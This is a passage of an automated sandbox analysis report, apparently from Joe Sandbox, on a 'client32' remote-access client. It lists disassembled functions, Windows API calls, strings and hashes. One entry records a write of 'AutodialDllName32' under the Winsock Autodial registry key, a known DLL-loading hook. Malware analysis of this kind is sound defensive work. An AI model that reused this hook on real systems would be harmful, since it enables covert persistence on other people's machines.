                                                        • Opcode ID: 3cc505f6fa39f18cb636a32da8b2f10ffb60bb9d01c7e8319a9f9713b2288b6a
                                                        • Instruction ID: 0817eb63cdeeee23d12745cd5909b56861137a8bde73a4db9cb5005db0e53ffe
                                                        • Opcode Fuzzy Hash: 3cc505f6fa39f18cb636a32da8b2f10ffb60bb9d01c7e8319a9f9713b2288b6a
                                                        • Instruction Fuzzy Hash: 09216A76A00700AFD711DB55CC84F9BFBE9FB49714F408929F95697784C774A900CBA0
                                                        APIs
                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103D83C
                                                        • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103D854
                                                        • DestroyCursor.USER32(00000000), ref: 1103D871
                                                        • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103D884
                                                        • UpdateWindow.USER32(00000000), ref: 1103D8C2
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1103D8AC
                                                        • m_hWnd, xrefs: 1103D8B1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 3726914545-1557312927
                                                        • Opcode ID: 1c2e4270b89d1f92e4223b88513b542f8f80d8360a50bd76c529a1a7560ce8a3
                                                        • Instruction ID: 110cd72dad802746724e554e61a36281017b722033c1a59c3057b23866efb7ab
                                                        • Opcode Fuzzy Hash: 1c2e4270b89d1f92e4223b88513b542f8f80d8360a50bd76c529a1a7560ce8a3
                                                        • Instruction Fuzzy Hash: CF21F3B9A50301BFE211AB75CC4AF9FF7E8AB85B05F108418F6599B2C0DBB0B4008764
                                                        APIs
                                                        • GetMenuItemCount.USER32(?), ref: 1114D21F
                                                        • _memset.LIBCMT ref: 1114D23B
                                                        • GetMenuItemID.USER32(?,00000000), ref: 1114D24C
                                                          • Part of subcall function 11132220: _memset.LIBCMT ref: 11132249
                                                          • Part of subcall function 11132220: GetVersionExA.KERNEL32(?), ref: 11132262
                                                        • CheckMenuItem.USER32(?,00000000,00000000), ref: 1114D288
                                                        • EnableMenuItem.USER32(?,00000000,00000000), ref: 1114D29E
                                                        • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1114D2B4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                        • String ID: 0
                                                        • API String ID: 176136580-4108050209
                                                        • Opcode ID: 9b42af547c3b3f2de27c1a2824a71c6ae62b3914f0dc5bd063f9124c19224f7e
                                                        • Instruction ID: 6978873c477c3921339f3242224bee586a119fd3f67b17aa56fa8a5c95e1a494
                                                        • Opcode Fuzzy Hash: 9b42af547c3b3f2de27c1a2824a71c6ae62b3914f0dc5bd063f9124c19224f7e
                                                        • Instruction Fuzzy Hash: 74216F71901219BBEF029BA4DD88FAFBBADEF59759F604025F801D6144E7B0DA00C760
                                                        APIs
                                                        • GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 11123391
                                                        • KillTimer.USER32(?,00000081,82E0FB89,75A33760,00000000,00000000,11178FC1,000000FF), ref: 111233D1
                                                        • GlobalDeleteAtom.KERNEL32 ref: 111233ED
                                                        • FreeLibrary.KERNEL32(?,?,82E0FB89,75A33760,00000000,00000000,11178FC1,000000FF), ref: 111233FE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressAtomDeleteFreeGlobalKillLibraryProcTimer
                                                        • String ID: DwmEnableComposition$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 239104392-1158585097
                                                        • Opcode ID: ac4ce4fd3e0cbf1a108bfb6aaa5dbba282e11219c93081d954dc0a5653b48ec3
                                                        • Instruction ID: 339d7fcd6c78bba5dbca9370eb91404beaec97e96fcf5122cf5d8dfe16e34f39
                                                        • Opcode Fuzzy Hash: ac4ce4fd3e0cbf1a108bfb6aaa5dbba282e11219c93081d954dc0a5653b48ec3
                                                        • Instruction Fuzzy Hash: 2C21D475A18715EFD721CF65C844B9AFBE8FB09718F10891DE8A683780DB74A540CB61
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • GlobalAddAtomA.KERNEL32(NSMCoolbar), ref: 11071385
                                                        • GetSysColor.USER32(0000000F), ref: 110713A3
                                                        • GetSysColor.USER32(00000014), ref: 110713AA
                                                        • GetSysColor.USER32(00000010), ref: 110713B1
                                                        • GetSysColor.USER32(00000008), ref: 110713B8
                                                        • GetSysColor.USER32(00000016), ref: 110713BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Color$AtomGlobal_malloc_memsetwsprintf
                                                        • String ID: NSMCoolbar
                                                        • API String ID: 1237614650-4124301854
                                                        • Opcode ID: 11a3e492c884ad001f6ac068dd0781362c712dc6c6d88ecbd5fc8d9c0d6a6434
                                                        • Instruction ID: 08995c28d4e1244f6da182c4ab23949e1325013c8a7c5b32581c9b49482f3fa5
                                                        • Opcode Fuzzy Hash: 11a3e492c884ad001f6ac068dd0781362c712dc6c6d88ecbd5fc8d9c0d6a6434
                                                        • Instruction Fuzzy Hash: C1118EB1A00788AFE720CF65CC85B5AFBE4FB09758F404A3EE55587B80DB75E9008B94
                                                        APIs
                                                        • _memset.LIBCMT ref: 110AF2A6
                                                        • GetFileVersionInfoSizeA.VERSION(?,?), ref: 110AF2BC
                                                        • _malloc.LIBCMT ref: 110AF2C7
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 110AF2E1
                                                        • VerQueryValueA.VERSION(00000000,11187354,?,?,?,?,00000000,00000000,?), ref: 110AF2FA
                                                        • _free.LIBCMT ref: 110AF30A
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileHeapInfoVersion$AllocateErrorFreeLastQuerySizeValue_free_malloc_memset
                                                        • String ID: shdocvw.dll
                                                        • API String ID: 2585106851-1755026807
                                                        • Opcode ID: a5a6dc1371e67929e549317819ac0ef8421456fe4466c86a96cd17ec10c32abf
                                                        • Instruction ID: 5eb31461ea1f50519f917a15bbfe73ab79f775fccf8d8aeefc1cc7a1de130f4a
                                                        • Opcode Fuzzy Hash: a5a6dc1371e67929e549317819ac0ef8421456fe4466c86a96cd17ec10c32abf
                                                        • Instruction Fuzzy Hash: E711937690412DABCB64CB54CC81EDEF378BF89708F1042EAE95957240EA706B84CF91
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 1103D566
                                                        • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D57C
                                                        • IsWindow.USER32(00000000), ref: 1103D584
                                                        • Sleep.KERNEL32(00000014), ref: 1103D597
                                                        • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D5A7
                                                        • IsWindow.USER32(00000000), ref: 1103D5AF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$Find$Sleep
                                                        • String ID: PCIVideoSlave32
                                                        • API String ID: 2137649973-2496367574
                                                        • Opcode ID: 1703b4c4a5965f14d39e20ba58b4c881867a64bd66d0339c621bbb7f38325315
                                                        • Instruction ID: 689c245a1c5877e120963c17b046aa8ad15570e82cb5b2dcf4060744f6f7f189
                                                        • Opcode Fuzzy Hash: 1703b4c4a5965f14d39e20ba58b4c881867a64bd66d0339c621bbb7f38325315
                                                        • Instruction Fuzzy Hash: C4F0A4B39012296FDB01DFB9CCC8F8EB7E9AB44AA9F414175F918E7188E230E4014B71
                                                        APIs
                                                        • LoadMenuA.USER32(00000000,00002EFF), ref: 1100336E
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 1100339A
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 110033BC
                                                        • DestroyMenu.USER32(00000000), ref: 110033CA
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                        • API String ID: 468487828-934300333
                                                        • Opcode ID: 370a918c1ffef44c6d2a1e7988c1972a9a3e997084686a8955a4fd91555efcf8
                                                        • Instruction ID: d55ef711f20a90ce7b89774d5e68305bce48b38f183b762cf5caec9f28e3c4fe
                                                        • Opcode Fuzzy Hash: 370a918c1ffef44c6d2a1e7988c1972a9a3e997084686a8955a4fd91555efcf8
                                                        • Instruction Fuzzy Hash: C9F0E97BE4066277D51351A59C85F9FF7D8DB966EEF048031F604F6280EB50A80041F5
                                                        APIs
                                                        • LoadMenuA.USER32(00000000,00002EF9), ref: 1100327D
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 110032A3
                                                        • GetMenuItemCount.USER32(00000000), ref: 110032C7
                                                        • DestroyMenu.USER32(00000000), ref: 110032D9
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                        • API String ID: 4241058051-934300333
                                                        • Opcode ID: 9d6183a6848e5764ebbed8253b940d7be87a8ceda2fe17ff10de54b997e3a651
                                                        • Instruction ID: 1ec89cdccd47366b5ee8b19df69f8a376e0222ab7e63b8b8b85f6a37c90a799a
                                                        • Opcode Fuzzy Hash: 9d6183a6848e5764ebbed8253b940d7be87a8ceda2fe17ff10de54b997e3a651
                                                        • Instruction Fuzzy Hash: 80F0E93AE445627BD5135265AC09FCFF6D4DB966AEF048030F400E5245EA10640085F1
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 1104B83D
                                                        • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1104B84E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostWindow
                                                        • String ID: 10.21.0.0$Client$Disconnect(%p), closing player$ReconnectDelay
                                                        • API String ID: 3618638489-3222940297
                                                        • Opcode ID: de6374e47233d955090eb4c934b1f2018db41b985611608a11f03de94963f4d7
                                                        • Instruction ID: fdd7292e2912fe1eae46148bd9e15f8ec271a2e4496cdee647683204071506ce
                                                        • Opcode Fuzzy Hash: de6374e47233d955090eb4c934b1f2018db41b985611608a11f03de94963f4d7
                                                        • Instruction Fuzzy Hash: 21516F79A05A029FDBD4DFA1CCC8FAAB364AF4530CF1845B8ED194F286DA75A800C761
                                                        APIs
                                                        • CreateMenu.USER32 ref: 110B3223
                                                        • AppendMenuA.USER32(?,00000010,00000000,?), ref: 110B3236
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$AppendCreateErrorExitLastMessageProcess_freewsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\IEFavourites.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 1956547959-127113396
                                                        • Opcode ID: ae0daca5e524887d6045aa3093877d1e47d145438e00f3db79d2cd643436765f
                                                        • Instruction ID: 1b6c63c24338c86407ebd4c0ec086c5d3198c705a6e80d99f4d3243e9f46137b
                                                        • Opcode Fuzzy Hash: ae0daca5e524887d6045aa3093877d1e47d145438e00f3db79d2cd643436765f
                                                        • Instruction Fuzzy Hash: 33518C7DA08606ABCB25CF55DC80F9EF3B4FF48718F208658ED2567780DB31A905CAA1
                                                        APIs
                                                        • GetVersionExA.KERNEL32(?), ref: 1105F10E
                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Services\Winsock\Autodial,00000000,00000000,00000000), ref: 1105F136
                                                        • RegSetValueExA.ADVAPI32(00000000,AutodialDllName32,00000000,?,111D92E1,00000010), ref: 1105F220
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1105F22D
                                                          • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Value$CloseOpenQueryVersion
                                                        • String ID: AutodialDllName32$System\CurrentControlSet\Services\Winsock\Autodial
                                                        • API String ID: 387276457-2283657482
                                                        • Opcode ID: a3b138f78b095ecd2dd4f2ceb670666107fbd6ca84dad05e8fdd868d7ed900a2
                                                        • Instruction ID: e4c3f3aff344711777e9417e9598a4d17be5596ef11d057f72070e3f7c066d2f
                                                        • Opcode Fuzzy Hash: a3b138f78b095ecd2dd4f2ceb670666107fbd6ca84dad05e8fdd868d7ed900a2
                                                        • Instruction Fuzzy Hash: C131A379E0021D9FDF60CF54CC88FADF7BAAB45308F4080D9E848A2141E7746A45CF52
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,82E0FB89,76872AF0,00000001,000000C8,110554E5,?,?,00000000,?,?), ref: 11055068
                                                        • timeGetTime.WINMM ref: 1105509B
                                                          • Part of subcall function 11131740: _strncpy.LIBCMT ref: 11131782
                                                        • SetEvent.KERNEL32(?), ref: 110550E4
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110550EB
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSectionwsprintf$EnterErrorEventExitLastLeaveMessageProcessTime_malloc_memset_strncpytime
                                                        • String ID: CltReconn.cpp$gMain.pReconnThread
                                                        • API String ID: 3397837340-2390197369
                                                        • Opcode ID: b682c9cf606a3662c13bb09a8953d970b76c9c428edd8b2ecbfa41850f18c41f
                                                        • Instruction ID: 951eb923e7c686365c6e5888714639626bc13f8e8268a3ec29750d4fc865e335
                                                        • Opcode Fuzzy Hash: b682c9cf606a3662c13bb09a8953d970b76c9c428edd8b2ecbfa41850f18c41f
                                                        • Instruction Fuzzy Hash: 2A317FB6D006159FCB51CFA8D880B9EFBF8FB48718F10856AE916E7244D775A900CBE1
                                                        APIs
                                                        • GetSystemMetrics.USER32(0000004C), ref: 110AF0F2
                                                        • GetSystemMetrics.USER32(0000004D), ref: 110AF0F9
                                                        • GetSystemMetrics.USER32(0000004E), ref: 110AF100
                                                        • GetSystemMetrics.USER32(0000004F), ref: 110AF107
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110AF116
                                                        • GetSystemMetrics.USER32(?), ref: 110AF124
                                                        • GetSystemMetrics.USER32(00000001), ref: 110AF133
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: System$Metrics$InfoParameters
                                                        • String ID:
                                                        • API String ID: 3136151823-0
                                                        • Opcode ID: bf5e026fc6f2f8d516ea3f6301bb30ff143f875d1c1b2847ac3ef235195643f8
                                                        • Instruction ID: 7c71a874cc683e3bf2dee40a1eb1ca687fcdd4ea94523516a10deac17ed6ea0e
                                                        • Opcode Fuzzy Hash: bf5e026fc6f2f8d516ea3f6301bb30ff143f875d1c1b2847ac3ef235195643f8
                                                        • Instruction Fuzzy Hash: 41310771E0030A9FCB14DFE9C881AAEFBF5AF88700F20842EE519A7380D674A841CF54
                                                        APIs
                                                          • Part of subcall function 110C63A0: wvsprintfA.USER32(?,?,00000000), ref: 110C63D2
                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009656
                                                        • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100966B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
